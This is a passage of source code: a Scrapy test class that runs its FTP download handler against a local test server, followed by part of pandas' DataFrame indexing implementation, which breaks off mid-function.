class FTPTestCase(unittest.TestCase):
    """Tests for FTPDownloadHandler against a local twisted FTP server."""
    username = "scrapy"
    password = "passwd"
    if twisted_version < (10, 2, 0):
        skip = "Twisted pre 10.2.0 doesn't allow to set home path other than /home"
    def setUp(self):
        # setup dirs and test file
        self.directory = self.mktemp()
        os.mkdir(self.directory)
        userdir = os.path.join(self.directory, self.username)
        os.mkdir(userdir)
        FilePath(userdir).child('file.txt').setContent("I have the power!")
        # setup server
        realm = FTPRealm(anonymousRoot=self.directory, userHome=self.directory)
        p = portal.Portal(realm)
        users_checker = checkers.InMemoryUsernamePasswordDatabaseDontUse()
        users_checker.addUser(self.username, self.password)
        p.registerChecker(users_checker, credentials.IUsernamePassword)
        self.factory = FTPFactory(portal=p)
        self.port = reactor.listenTCP(0, self.factory, interface="127.0.0.1")
        self.portNum = self.port.getHost().port
        self.download_handler = FTPDownloadHandler(Settings())
        self.addCleanup(self.port.stopListening)
    def _add_test_callbacks(self, deferred, callback=None, errback=None):
        """Close the FTP client connection, then run the test callbacks."""
        def _clean(data):
            self.download_handler.client.transport.loseConnection()
            return data
        deferred.addCallback(_clean)
        if callback:
            deferred.addCallback(callback)
        if errback:
            deferred.addErrback(errback)
        return deferred
    def test_ftp_download_success(self):
        request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": self.password})
        d = self.download_handler.download_request(request, None)
        def _test(r):
            self.assertEqual(r.status, 200)
            self.assertEqual(r.body, 'I have the power!')
            self.assertEqual(r.headers, {'Local Filename': [''], 'Size': ['17']})
        return self._add_test_callbacks(d, _test)
    def test_ftp_download_notexist(self):
        # a missing remote file maps to a 404 response
        request = Request(url="ftp://127.0.0.1:%s/notexist.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": self.password})
        d = self.download_handler.download_request(request, None)
        def _test(r):
            self.assertEqual(r.status, 404)
        return self._add_test_callbacks(d, _test)
    def test_ftp_local_filename(self):
        # with ftp_local_filename set, the body holds the local path and the
        # payload is written to that file
        local_fname = "/tmp/file.txt"
        request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": self.password, "ftp_local_filename": local_fname})
        d = self.download_handler.download_request(request, None)
        def _test(r):
            self.assertEqual(r.body, local_fname)
            self.assertEqual(r.headers, {'Local Filename': ['/tmp/file.txt'], 'Size': ['17']})
            self.assertTrue(os.path.exists(local_fname))
            with open(local_fname) as f:
                self.assertEqual(f.read(), "I have the power!")
            os.remove(local_fname)
        return self._add_test_callbacks(d, _test)
    def test_invalid_credentials(self):
        # a wrong password makes the server drop the connection
        request = Request(url="ftp://127.0.0.1:%s/file.txt" % self.portNum,
                meta={"ftp_user": self.username, "ftp_password": 'invalid'})
        d = self.download_handler.download_request(request, None)
        def _test(r):
            self.assertEqual(r.type, ConnectionLost)
        return self._add_test_callbacks(d, errback=_test)
| scrapinghub/scrapy | tests/test_downloader_handlers.py | Python | bsd-3-clause | 18,951 |
# pylint: disable=W0223
from pandas.core.index import Index, MultiIndex
from pandas.compat import range, zip
import pandas.compat as compat
import pandas.core.common as com
from pandas.core.common import (is_bool_indexer, is_integer_dtype,
_asarray_tuplesafe, is_list_like, isnull,
is_null_slice, is_full_slice,
ABCSeries, ABCDataFrame, ABCPanel, is_float,
_values_from_object, _infer_fill_value, is_integer)
import numpy as np
# the supported indexers
def get_indexers_list():
    """Return the (attribute name, indexer class) pairs installed on NDFrame."""
    return [
        ('ix', _IXIndexer),
        ('iloc', _iLocIndexer),
        ('loc', _LocIndexer),
        ('at', _AtIndexer),
        ('iat', _iAtIndexer),
    ]
# "null slice": slice(None, None) selects everything along an axis
_NS = slice(None, None)
# the public IndexSlicerMaker
class _IndexSlice(object):
    """Indexing helper: ``IndexSlice[...]`` returns its argument unchanged,
    giving natural slice syntax for building indexer tuples."""
    def __getitem__(self, arg):
        return arg
# the single public instance
IndexSlice = _IndexSlice()
class IndexingError(Exception):
    """Raised when an indexing operation cannot be performed."""
    pass
class _NDFrameIndexer(object):
_valid_types = None
_exception = KeyError
    def __init__(self, obj, name):
        # obj: the NDFrame being indexed; name: the indexer attribute name
        # ('ix', 'loc', 'iloc', ...)
        self.obj = obj
        self.ndim = obj.ndim
        self.name = name
        # optional axis restriction, set through __call__(axis=...)
        self.axis = None
    def __call__(self, *args, **kwargs):
        """Return a fresh copy of this indexer with keyword attributes
        (e.g. ``axis``) applied."""
        # we need to return a copy of ourselves
        self = self.__class__(self.obj, self.name)
        # set the passed in values
        for k, v in compat.iteritems(kwargs):
            setattr(self,k,v)
        return self
    def __iter__(self):
        # iterating an indexer object has no meaning; fail loudly
        raise NotImplementedError('ix is not iterable')
    def __getitem__(self, key):
        """Dispatch a getitem: scalar fast-path, tuple path, or single axis."""
        if type(key) is tuple:
            # fast path: a tuple key may address a single scalar cell
            try:
                values = self.obj.get_value(*key)
                if np.isscalar(values):
                    return values
            except Exception:
                pass
            return self._getitem_tuple(key)
        else:
            return self._getitem_axis(key, axis=0)
    def _get_label(self, label, axis=0):
        """Label-based lookup of ``label`` along ``axis``."""
        if self.ndim == 1:
            # for perf reasons we want to try _xs first
            # as its basically direct indexing
            # but will fail when the index is not present
            # see GH5667
            try:
                return self.obj._xs(label, axis=axis)
            except:
                # NOTE(review): bare except; falls back to plain __getitem__
                return self.obj[label]
        elif (isinstance(label, tuple) and
                isinstance(label[axis], slice)):
            raise IndexingError('no slices here, handle elsewhere')
        return self.obj._xs(label, axis=axis)
    def _get_loc(self, key, axis=0):
        # positional (integer location) lookup
        return self.obj._ixs(key, axis=axis)
    def _slice(self, obj, axis=0, kind=None):
        # delegate slicing to the underlying NDFrame
        return self.obj._slice(obj, axis=axis, kind=kind)
    def _get_setitem_indexer(self, key):
        """Convert ``key`` into an indexer suitable for _setitem_with_indexer."""
        if self.axis is not None:
            return self._convert_tuple(key, is_setter=True)
        axis = self.obj._get_axis(0)
        if isinstance(axis, MultiIndex):
            # a MultiIndex may resolve the key directly
            try:
                return axis.get_loc(key)
            except Exception:
                pass
        if isinstance(key, tuple) and not self.ndim < len(key):
            return self._convert_tuple(key, is_setter=True)
        if isinstance(key, range):
            return self._convert_range(key, is_setter=True)
        try:
            return self._convert_to_indexer(key, is_setter=True)
        except TypeError:
            raise IndexingError(key)
    def __setitem__(self, key, value):
        """Convert ``key`` to an indexer, then perform the assignment."""
        indexer = self._get_setitem_indexer(key)
        self._setitem_with_indexer(indexer, value)
    def _has_valid_type(self, k, axis):
        # subclasses define which key types are acceptable for each axis
        raise NotImplementedError()
def _has_valid_tuple(self, key):
""" check the key for valid keys across my indexer """
for i, k in enumerate(key):
if i >= self.obj.ndim:
raise IndexingError('Too many indexers')
if not self._has_valid_type(k, i):
raise ValueError("Location based indexing can only have [%s] "
"types" % self._valid_types)
def _should_validate_iterable(self, axis=0):
""" return a boolean whether this axes needs validation for a passed iterable """
ax = self.obj._get_axis(axis)
if isinstance(ax, MultiIndex):
return False
elif ax.is_floating():
return False
return True
def _is_nested_tuple_indexer(self, tup):
if any([ isinstance(ax, MultiIndex) for ax in self.obj.axes ]):
return any([ is_nested_tuple(tup,ax) for ax in self.obj.axes ])
return False
    def _convert_tuple(self, key, is_setter=False):
        """Convert a (possibly axis-restricted) key into a per-axis indexer tuple."""
        keyidx = []
        if self.axis is not None:
            # key applies to self.axis only; all other axes get a null slice
            axis = self.obj._get_axis_number(self.axis)
            for i in range(self.ndim):
                if i == axis:
                    keyidx.append(self._convert_to_indexer(key, axis=axis, is_setter=is_setter))
                else:
                    keyidx.append(slice(None))
        else:
            for i, k in enumerate(key):
                idx = self._convert_to_indexer(k, axis=i, is_setter=is_setter)
                keyidx.append(idx)
        return tuple(keyidx)
    def _convert_range(self, key, is_setter=False):
        """ convert a range argument to a list of positions """
        return list(key)
    def _convert_scalar_indexer(self, key, axis):
        """Delegate scalar-key conversion to the axis Index."""
        # if we are accessing via lowered dim, use the last dim
        ax = self.obj._get_axis(min(axis, self.ndim - 1))
        # a scalar
        return ax._convert_scalar_indexer(key, kind=self.name)
    def _convert_slice_indexer(self, key, axis):
        """Delegate slice-key conversion to the axis Index."""
        # if we are accessing via lowered dim, use the last dim
        ax = self.obj._get_axis(min(axis, self.ndim - 1))
        return ax._convert_slice_indexer(key, kind=self.name)
    def _has_valid_setitem_indexer(self, indexer):
        # the base indexer accepts any setitem indexer; subclasses restrict
        return True
def _has_valid_positional_setitem_indexer(self, indexer):
""" validate that an positional indexer cannot enlarge its target
will raise if needed, does not modify the indexer externally """
if isinstance(indexer, dict):
raise IndexError("{0} cannot enlarge its target object"
.format(self.name))
else:
if not isinstance(indexer, tuple):
indexer = self._tuplify(indexer)
for ax, i in zip(self.obj.axes, indexer):
if isinstance(i, slice):
# should check the stop slice?
pass
elif is_list_like_indexer(i):
# should check the elements?
pass
elif is_integer(i):
if i >= len(ax):
raise IndexError("{0} cannot enlarge its target object"
.format(self.name))
elif isinstance(i, dict):
raise IndexError("{0} cannot enlarge its target object"
.format(self.name))
return True
    def _setitem_with_indexer(self, indexer, value):
        """Set ``value`` into ``self.obj`` at the positions described by
        ``indexer`` (the output of _get_setitem_indexer), enlarging the
        object in place when the indexer refers to missing labels."""
        self._has_valid_setitem_indexer(indexer)
        # also has the side effect of consolidating in-place
        from pandas import Panel, DataFrame, Series
        info_axis = self.obj._info_axis_number
        # maybe partial set
        take_split_path = self.obj._is_mixed_type
        # if there is only one block/type, still have to take split path
        # unless the block is one-dimensional or it can hold the value
        if not take_split_path and self.obj._data.blocks:
            blk, = self.obj._data.blocks
            if 1 < blk.ndim: # in case of dict, keys are indices
                val = list(value.values()) if isinstance(value,dict) else value
                take_split_path = not blk._can_hold_element(val)
        if isinstance(indexer, tuple) and len(indexer) == len(self.obj.axes):
            for i, ax in zip(indexer, self.obj.axes):
                # if we have any multi-indexes that have non-trivial slices (not null slices)
                # then we must take the split path, xref GH 10360
                if isinstance(ax, MultiIndex) and not (is_integer(i) or is_null_slice(i)):
                    take_split_path = True
                    break
        if isinstance(indexer, tuple):
            nindexer = []
            for i, idx in enumerate(indexer):
                if isinstance(idx, dict):
                    # reindex the axis to the new value
                    # and set inplace
                    key, _ = convert_missing_indexer(idx)
                    # if this is the items axes, then take the main missing
                    # path first
                    # this correctly sets the dtype and avoids cache issues
                    # essentially this separates out the block that is needed
                    # to possibly be modified
                    if self.ndim > 1 and i == self.obj._info_axis_number:
                        # add the new item, and set the value
                        # must have all defined axes if we have a scalar
                        # or a list-like on the non-info axes if we have a
                        # list-like
                        len_non_info_axes = [
                            len(_ax) for _i, _ax in enumerate(self.obj.axes)
                            if _i != i
                        ]
                        if any([not l for l in len_non_info_axes]):
                            if not is_list_like_indexer(value):
                                raise ValueError("cannot set a frame with no "
                                                 "defined index and a scalar")
                            self.obj[key] = value
                            return self.obj
                        # add a new item with the dtype setup
                        self.obj[key] = _infer_fill_value(value)
                        new_indexer = convert_from_missing_indexer_tuple(
                            indexer, self.obj.axes)
                        self._setitem_with_indexer(new_indexer, value)
                        return self.obj
                    # reindex the axis
                    # make sure to clear the cache because we are
                    # just replacing the block manager here
                    # so the object is the same
                    index = self.obj._get_axis(i)
                    labels = index.insert(len(index),key)
                    self.obj._data = self.obj.reindex_axis(labels, i)._data
                    self.obj._maybe_update_cacher(clear=True)
                    self.obj.is_copy=None
                    nindexer.append(labels.get_loc(key))
                else:
                    nindexer.append(idx)
            indexer = tuple(nindexer)
        else:
            indexer, missing = convert_missing_indexer(indexer)
            if missing:
                # reindex the axis to the new value
                # and set inplace
                if self.ndim == 1:
                    index = self.obj.index
                    new_index = index.insert(len(index),indexer)
                    # this preserves dtype of the value
                    new_values = Series([value])._values
                    if len(self.obj._values):
                        new_values = np.concatenate([self.obj._values,
                                                     new_values])
                    self.obj._data = self.obj._constructor(
                        new_values, index=new_index, name=self.obj.name)._data
                    self.obj._maybe_update_cacher(clear=True)
                    return self.obj
                elif self.ndim == 2:
                    # no columns and scalar
                    if not len(self.obj.columns):
                        raise ValueError(
                            "cannot set a frame with no defined columns"
                        )
                    # append a Series
                    if isinstance(value, Series):
                        value = value.reindex(index=self.obj.columns,copy=True)
                        value.name = indexer
                    # a list-list
                    else:
                        # must have conforming columns
                        if is_list_like_indexer(value):
                            if len(value) != len(self.obj.columns):
                                raise ValueError(
                                    "cannot set a row with mismatched columns"
                                )
                        value = Series(value,index=self.obj.columns,name=indexer)
                    self.obj._data = self.obj.append(value)._data
                    self.obj._maybe_update_cacher(clear=True)
                    return self.obj
                # set using setitem (Panel and > dims)
                elif self.ndim >= 3:
                    return self.obj.__setitem__(indexer, value)
        # set
        item_labels = self.obj._get_axis(info_axis)
        # align and set the values
        if take_split_path:
            # split path: set column-by-column through ``setter`` below
            if not isinstance(indexer, tuple):
                indexer = self._tuplify(indexer)
            if isinstance(value, ABCSeries):
                value = self._align_series(indexer, value)
            info_idx = indexer[info_axis]
            if is_integer(info_idx):
                info_idx = [info_idx]
            labels = item_labels[info_idx]
            # if we have a partial multiindex, then need to adjust the plane
            # indexer here
            if (len(labels) == 1 and
                    isinstance(self.obj[labels[0]].axes[0], MultiIndex)):
                item = labels[0]
                obj = self.obj[item]
                index = obj.index
                idx = indexer[:info_axis][0]
                plane_indexer = tuple([idx]) + indexer[info_axis + 1:]
                lplane_indexer = length_of_indexer(plane_indexer[0], index)
                # require that we are setting the right number of values that
                # we are indexing
                if is_list_like_indexer(value) and np.iterable(value) and lplane_indexer != len(value):
                    if len(obj[idx]) != len(value):
                        raise ValueError(
                            "cannot set using a multi-index selection indexer "
                            "with a different length than the value"
                        )
                    # make sure we have an ndarray
                    value = getattr(value,'values',value).ravel()
                # we can directly set the series here
                # as we select a slice indexer on the mi
                idx = index._convert_slice_indexer(idx)
                obj._consolidate_inplace()
                obj = obj.copy()
                obj._data = obj._data.setitem(indexer=tuple([idx]), value=value)
                self.obj[item] = obj
                return
            # non-mi
            else:
                plane_indexer = indexer[:info_axis] + indexer[info_axis + 1:]
                if info_axis > 0:
                    plane_axis = self.obj.axes[:info_axis][0]
                    lplane_indexer = length_of_indexer(plane_indexer[0],
                                                       plane_axis)
                else:
                    lplane_indexer = 0
            def setter(item, v):
                # set one column's values, handling possible dtype change
                s = self.obj[item]
                pi = plane_indexer[0] if lplane_indexer == 1 else plane_indexer
                # perform the equivalent of a setitem on the info axis
                # as we have a null slice or a slice with full bounds
                # which means essentially reassign to the columns of a multi-dim object
                # GH6149 (null slice), GH10408 (full bounds)
                if isinstance(pi, tuple) and all(is_null_slice(idx) or is_full_slice(idx, len(self.obj)) for idx in pi):
                    s = v
                else:
                    # set the item, possibly having a dtype change
                    s._consolidate_inplace()
                    s = s.copy()
                    s._data = s._data.setitem(indexer=pi, value=v)
                    s._maybe_update_cacher(clear=True)
                # reset the sliced object if unique
                self.obj[item] = s
            def can_do_equal_len():
                """ return True if we have an equal len settable """
                if not len(labels) == 1 or not np.iterable(value):
                    return False
                l = len(value)
                item = labels[0]
                index = self.obj[item].index
                # equal len list/ndarray
                if len(index) == l:
                    return True
                elif lplane_indexer == l:
                    return True
                return False
            # we need an iterable, with a ndim of at least 1
            # eg. don't pass through np.array(0)
            if is_list_like_indexer(value) and getattr(value,'ndim',1) > 0:
                # we have an equal len Frame
                if isinstance(value, ABCDataFrame) and value.ndim > 1:
                    sub_indexer = list(indexer)
                    multiindex_indexer = isinstance(labels, MultiIndex)
                    for item in labels:
                        if item in value:
                            sub_indexer[info_axis] = item
                            v = self._align_series(
                                tuple(sub_indexer), value[item], multiindex_indexer
                            )
                        else:
                            v = np.nan
                        setter(item, v)
                # we have an equal len ndarray/convertible to our labels
                elif np.array(value).ndim == 2:
                    # note that this coerces the dtype if we are mixed
                    # GH 7551
                    value = np.array(value,dtype=object)
                    if len(labels) != value.shape[1]:
                        raise ValueError('Must have equal len keys and value '
                                         'when setting with an ndarray')
                    for i, item in enumerate(labels):
                        # setting with a list, recoerces
                        setter(item, value[:, i].tolist())
                # we have an equal len list/ndarray
                elif can_do_equal_len():
                    setter(labels[0], value)
                # per label values
                else:
                    if len(labels) != len(value):
                        raise ValueError('Must have equal len keys and value '
                                         'when setting with an iterable')
                    for item, v in zip(labels, value):
                        setter(item, v)
            else:
                # scalar
                for item in labels:
                    setter(item, value)
        else:
            # single-block path: set directly on the block manager
            if isinstance(indexer, tuple):
                indexer = maybe_convert_ix(*indexer)
                # if we are setting on the info axis ONLY
                # set using those methods to avoid block-splitting
                # logic here
                if len(indexer) > info_axis and is_integer(indexer[info_axis]) and all(
                    is_null_slice(idx) for i, idx in enumerate(indexer) if i != info_axis):
                    self.obj[item_labels[indexer[info_axis]]] = value
                    return
            if isinstance(value, (ABCSeries, dict)):
                value = self._align_series(indexer, Series(value))
            elif isinstance(value, ABCDataFrame):
                value = self._align_frame(indexer, value)
            if isinstance(value, ABCPanel):
                value = self._align_panel(indexer, value)
            # check for chained assignment
            self.obj._check_is_chained_assignment_possible()
            # actually do the set
            self.obj._consolidate_inplace()
            self.obj._data = self.obj._data.setitem(indexer=indexer, value=value)
            self.obj._maybe_update_cacher(clear=True)
    def _align_series(self, indexer, ser, multiindex_indexer=False):
        """
        Broadcast ``ser`` to the shape selected by ``indexer``.

        Parameters
        ----------
        indexer : tuple, slice, scalar
            The indexer used to get the locations that will be set to
            `ser`
        ser : pd.Series
            The values to assign to the locations specified by `indexer`
        multiindex_indexer : boolean, optional
            Defaults to False. Should be set to True if `indexer` was from
            a `pd.MultiIndex`, to avoid unnecessary broadcasting.

        Returns
        -------
        `np.array` of `ser` broadcast to the appropriate shape for assignment
        to the locations selected by `indexer`
        """
        if isinstance(indexer, (slice, np.ndarray, list, Index)):
            indexer = tuple([indexer])
        if isinstance(indexer, tuple):
            # flatten np.ndarray indexers
            ravel = lambda i: i.ravel() if isinstance(i, np.ndarray) else i
            indexer = tuple(map(ravel, indexer))
            aligners = [not is_null_slice(idx) for idx in indexer]
            sum_aligners = sum(aligners)
            single_aligner = sum_aligners == 1
            is_frame = self.obj.ndim == 2
            is_panel = self.obj.ndim >= 3
            obj = self.obj
            # are we a single alignable value on a non-primary
            # dim (e.g. panel: 1,2, or frame: 0) ?
            # hence need to align to a single axis dimension
            # rather that find all valid dims
            # frame
            if is_frame:
                single_aligner = single_aligner and aligners[0]
            # panel
            elif is_panel:
                single_aligner = (single_aligner and
                                  (aligners[1] or aligners[2]))
            # we have a frame, with multiple indexers on both axes; and a
            # series, so need to broadcast (see GH5206)
            if (sum_aligners == self.ndim and
                    all([com.is_sequence(_) for _ in indexer])):
                ser = ser.reindex(obj.axes[0][indexer[0]], copy=True)._values
                # single indexer
                if len(indexer) > 1 and not multiindex_indexer:
                    l = len(indexer[1])
                    ser = np.tile(ser, l).reshape(l, -1).T
                return ser
            for i, idx in enumerate(indexer):
                ax = obj.axes[i]
                # multiple aligners (or null slices)
                if com.is_sequence(idx) or isinstance(idx, slice):
                    if single_aligner and is_null_slice(idx):
                        continue
                    new_ix = ax[idx]
                    if not is_list_like_indexer(new_ix):
                        new_ix = Index([new_ix])
                    else:
                        new_ix = Index(new_ix)
                    if ser.index.equals(new_ix) or not len(new_ix):
                        return ser._values.copy()
                    return ser.reindex(new_ix)._values
                # 2 dims
                elif single_aligner and is_frame:
                    # reindex along index
                    ax = self.obj.axes[1]
                    if ser.index.equals(ax) or not len(ax):
                        return ser._values.copy()
                    return ser.reindex(ax)._values
                # >2 dims
                elif single_aligner:
                    broadcast = []
                    for n, labels in enumerate(self.obj._get_plane_axes(i)):
                        # reindex along the matching dimensions
                        if len(labels & ser.index):
                            ser = ser.reindex(labels)
                        else:
                            broadcast.append((n, len(labels)))
                    # broadcast along other dims
                    ser = ser._values.copy()
                    for (axis, l) in broadcast:
                        shape = [-1] * (len(broadcast) + 1)
                        shape[axis] = l
                        ser = np.tile(ser, l).reshape(shape)
                    if self.obj.ndim == 3:
                        ser = ser.T
                    return ser
        elif np.isscalar(indexer):
            # scalar indexer on a frame: align the series to the columns
            ax = self.obj._get_axis(1)
            if ser.index.equals(ax):
                return ser._values.copy()
            return ser.reindex(ax)._values
        raise ValueError('Incompatible indexer with Series')
def _align_frame(self, indexer, df):
is_frame = self.obj.ndim == 2
is_panel = self.obj.ndim >= 3
if isinstance(indexer, tuple):
aligners = [not is_null_slice(idx) for idx in indexer]
sum_aligners = sum(aligners)
single_aligner = sum_aligners == 1
idx, cols = None, None
sindexers = []
for i, ix in enumerate(indexer):
ax = self.obj.axes[i]
if com.is_sequence(ix) or isinstance(ix, slice):
if idx is None:
idx = ax[ix].ravel()
elif cols is None:
cols = ax[ix].ravel()
else:
break
else:
sindexers.append(i)
# panel
if is_panel:
# need to conform to the convention
# as we are not selecting on the items axis
# and we have a single indexer
# GH 7763
if len(sindexers) == 1 and sindexers[0] != 0:
df = df.T
if idx is None:
idx = df.index
if cols is None:
cols = df.columns
if idx is not None and cols is not None:
if df.index.equals(idx) and df.columns.equals(cols):
val = df.copy()._values
else:
val = df.reindex(idx, columns=cols)._values
return val
elif ((isinstance(indexer, slice) or is_list_like_indexer(indexer))
and is_frame):
ax = self.obj.index[indexer]
if df.index.equals(ax):
val = df.copy()._values
else:
# we have a multi-index and are trying to align
# with a particular, level GH3738
if isinstance(ax, MultiIndex) and isinstance(
df.index, MultiIndex) and ax.nlevels != df.index.nlevels:
raise TypeError("cannot align on a multi-index with out specifying the join levels")
val = df.reindex(index=ax)._values
return val
elif np.isscalar(indexer) and is_panel:
idx = self.obj.axes[1]
cols = self.obj.axes[2]
# by definition we are indexing on the 0th axis
# a passed in dataframe which is actually a transpose
# of what is needed
if idx.equals(df.index) and cols.equals(df.columns):
return df.copy()._values
return df.reindex(idx, columns=cols)._values
raise ValueError('Incompatible indexer with DataFrame')
def _align_panel(self, indexer, df):
    """Align a DataFrame to a Panel selection.

    Setting into a Panel through a DataFrame indexer is not supported,
    so this unconditionally raises NotImplementedError.  (The original
    computed ``is_frame``/``is_panel`` flags that were never used; they
    have been removed.)
    """
    raise NotImplementedError("cannot set using an indexer with a Panel "
                              "yet!")
def _getitem_tuple(self, tup):
    """Index with a tuple of per-axis keys.

    Tries the dimension-reducing path first, then a single-reindex
    shortcut, and finally applies each key axis-by-axis.
    """
    try:
        return self._getitem_lowerdim(tup)
    except IndexingError:
        pass
    # no multi-index, so validate all of the indexers
    self._has_valid_tuple(tup)
    # ugly hack for GH #836
    if self._multi_take_opportunity(tup):
        return self._multi_take(tup)
    # no shortcut needed
    retval = self.obj
    for i, key in enumerate(tup):
        if i >= self.obj.ndim:
            raise IndexingError('Too many indexers')
        # null slices select everything -- skip them
        if is_null_slice(key):
            continue
        # re-enter through the named indexer so each step revalidates
        retval = getattr(retval, self.name)._getitem_axis(key, axis=i)
    return retval
def _multi_take_opportunity(self, tup):
    """Return True when every component of ``tup`` is list-like and the
    whole selection can be satisfied by a single reindex call."""
    from pandas.core.generic import NDFrame
    # ugly hack for GH #836
    if not isinstance(self.obj, NDFrame):
        return False
    if not all(is_list_like_indexer(x) for x in tup):
        return False
    # just too complicated: bail on MultiIndex axes, boolean masks,
    # and non-unique axes
    for indexer, ax in zip(tup, self.obj._data.axes):
        if (isinstance(ax, MultiIndex) or is_bool_indexer(indexer)
                or not ax.is_unique):
            return False
    return True
def _multi_take(self, tup):
    """ create the reindex map for our objects, raise the _exception if we
    can't create the indexer
    """
    try:
        o = self.obj
        # build one reindex kwarg per axis: axis name -> resolved labels
        d = dict([
            (a, self._convert_for_reindex(t, axis=o._get_axis_number(a)))
            for t, a in zip(tup, o._AXIS_ORDERS)
        ])
        return o.reindex(**d)
    except:
        # any failure is surfaced as the indexer-specific exception type
        raise self._exception
def _convert_for_reindex(self, key, axis=0):
    """Resolve ``key`` into concrete labels on ``axis`` suitable for
    passing to ``reindex``.

    Boolean masks are converted to the selected labels; integer arrays
    against a non-integer axis are treated as positions.
    """
    labels = self.obj._get_axis(axis)
    if is_bool_indexer(key):
        key = check_bool_indexer(labels, key)
        return labels[key]
    else:
        if isinstance(key, Index):
            # want Index objects to pass through untouched
            keyarr = key
        else:
            # asarray can be unsafe, NumPy strings are weird
            keyarr = _asarray_tuplesafe(key)
        if is_integer_dtype(keyarr) and not labels.is_integer():
            # integers against a non-integer axis are positional
            keyarr = com._ensure_platform_int(keyarr)
            return labels.take(keyarr)
        return keyarr
def _handle_lowerdim_multi_index_axis0(self, tup):
    # we have an axis0 multi-index, handle or raise
    # returns the selected object, None (caller should try another
    # strategy), or re-raises
    try:
        # fast path for series or for tup devoid of slices
        return self._get_label(tup, axis=0)
    except TypeError:
        # slices are unhashable
        pass
    except Exception as e1:
        if isinstance(tup[0], (slice, Index)):
            raise IndexingError("Handle elsewhere")
        # raise the error if we are not sorted
        ax0 = self.obj._get_axis(0)
        if not ax0.is_lexsorted_for_tuple(tup):
            raise e1
    # signal "not handled here" so the caller can fall through
    return None
def _getitem_lowerdim(self, tup):
    """Attempt to reduce the dimensionality of a tuple indexer by
    selecting on one axis first and recursing into the result.

    Raises IndexingError when no component of the tuple allows a
    dimension-reducing selection.
    """
    # we can directly get the axis result since the axis is specified
    if self.axis is not None:
        axis = self.obj._get_axis_number(self.axis)
        return self._getitem_axis(tup, axis=axis)
    # we may have a nested tuples indexer here
    if self._is_nested_tuple_indexer(tup):
        return self._getitem_nested_tuple(tup)
    # we maybe be using a tuple to represent multiple dimensions here
    ax0 = self.obj._get_axis(0)
    if isinstance(ax0, MultiIndex):
        result = self._handle_lowerdim_multi_index_axis0(tup)
        if result is not None:
            return result
    if len(tup) > self.obj.ndim:
        raise IndexingError("Too many indexers. handle elsewhere")
    # to avoid wasted computation
    # df.ix[d1:d2, 0] -> columns first (True)
    # df.ix[0, ['C', 'B', A']] -> rows first (False)
    for i, key in enumerate(tup):
        if is_label_like(key) or isinstance(key, tuple):
            section = self._getitem_axis(key, axis=i)
            # we have yielded a scalar ?
            if not is_list_like_indexer(section):
                return section
            elif section.ndim == self.ndim:
                # we're in the middle of slicing through a MultiIndex
                # revise the key wrt to `section` by inserting an _NS
                new_key = tup[:i] + (_NS,) + tup[i + 1:]
            else:
                new_key = tup[:i] + tup[i + 1:]
                # unfortunately need an odious kludge here because of
                # DataFrame transposing convention
                if (isinstance(section, ABCDataFrame) and i > 0
                        and len(new_key) == 2):
                    a, b = new_key
                    new_key = b, a
                if len(new_key) == 1:
                    new_key, = new_key
            # This is an elided recursive call to iloc/loc/etc'
            return getattr(section, self.name)[new_key]
    raise IndexingError('not applicable')
def _getitem_nested_tuple(self, tup):
    """Handle a tuple indexer that contains nested tuples (implies at
    least one MultiIndex level), reducing axis by axis."""
    # we have a nested tuple so have at least 1 multi-index level
    # we should be able to match up the dimensionaility here
    # we have too many indexers for our dim, but have at least 1
    # multi-index dimension, try to see if we have something like
    # a tuple passed to a series with a multi-index
    if len(tup) > self.ndim:
        result = self._handle_lowerdim_multi_index_axis0(tup)
        if result is not None:
            return result
        # this is a series with a multi-index specified a tuple of selectors
        return self._getitem_axis(tup, axis=0)
    # handle the multi-axis by taking sections and reducing
    # this is iterative
    obj = self.obj
    axis = 0
    for i, key in enumerate(tup):
        if is_null_slice(key):
            axis += 1
            continue
        current_ndim = obj.ndim
        obj = getattr(obj, self.name)._getitem_axis(key, axis=axis)
        axis += 1
        # if we have a scalar, we are done
        if np.isscalar(obj) or not hasattr(obj,'ndim'):
            break
        # has the dim of the obj changed?
        # GH 7199
        if obj.ndim < current_ndim:
            # GH 7516
            # if had a 3 dim and are going to a 2d
            # axes are reversed on a DataFrame
            if i >= 1 and current_ndim == 3 and obj.ndim == 2:
                obj = obj.T
            # the reduced object has one fewer axis ahead of us
            axis -= 1
    return obj
def _getitem_axis(self, key, axis=0):
    """Select along a single axis, dispatching on the key type:
    slice, list-like, or scalar label/position."""
    if self._should_validate_iterable(axis):
        self._has_valid_type(key, axis)
    labels = self.obj._get_axis(axis)
    if isinstance(key, slice):
        return self._get_slice_axis(key, axis=axis)
    elif is_list_like_indexer(key) and not (isinstance(key, tuple) and
                                            isinstance(labels, MultiIndex)):
        if hasattr(key, 'ndim') and key.ndim > 1:
            raise ValueError('Cannot index with multidimensional key')
        return self._getitem_iterable(key, axis=axis)
    else:
        if is_integer(key):
            if axis == 0 and isinstance(labels, MultiIndex):
                try:
                    # try the label first on a MultiIndex level
                    return self._get_label(key, axis=axis)
                except (KeyError, TypeError):
                    # only re-raise when positional fallback is ruled out
                    if self.obj.index.levels[0].is_integer():
                        raise
            # this is the fallback! (for a non-float, non-integer index)
            if not labels.is_floating() and not labels.is_integer():
                return self._get_loc(key, axis=axis)
        return self._get_label(key, axis=axis)
def _getitem_iterable(self, key, axis=0):
    """Select with a list-like key along ``axis``.

    Boolean masks are taken directly; label arrays go through the
    index's own converter, then reindexing (unique axes) or the
    non-unique reindex path.
    """
    if self._should_validate_iterable(axis):
        self._has_valid_type(key, axis)
    labels = self.obj._get_axis(axis)
    if is_bool_indexer(key):
        key = check_bool_indexer(labels, key)
        inds, = key.nonzero()
        return self.obj.take(inds, axis=axis, convert=False)
    else:
        if isinstance(key, Index):
            # want Index objects to pass through untouched
            keyarr = key
        else:
            # asarray can be unsafe, NumPy strings are weird
            keyarr = _asarray_tuplesafe(key)
        # have the index handle the indexer and possibly return
        # an indexer or raising
        indexer = labels._convert_list_indexer(keyarr, kind=self.name)
        if indexer is not None:
            return self.obj.take(indexer, axis=axis)
        # this is not the most robust, but...
        # non-tuple keys against a MultiIndex select on level 0
        if (isinstance(labels, MultiIndex) and len(keyarr) and
                not isinstance(keyarr[0], tuple)):
            level = 0
        else:
            level = None
        # existing labels are unique and indexer are unique
        if labels.is_unique and Index(keyarr).is_unique:
            try:
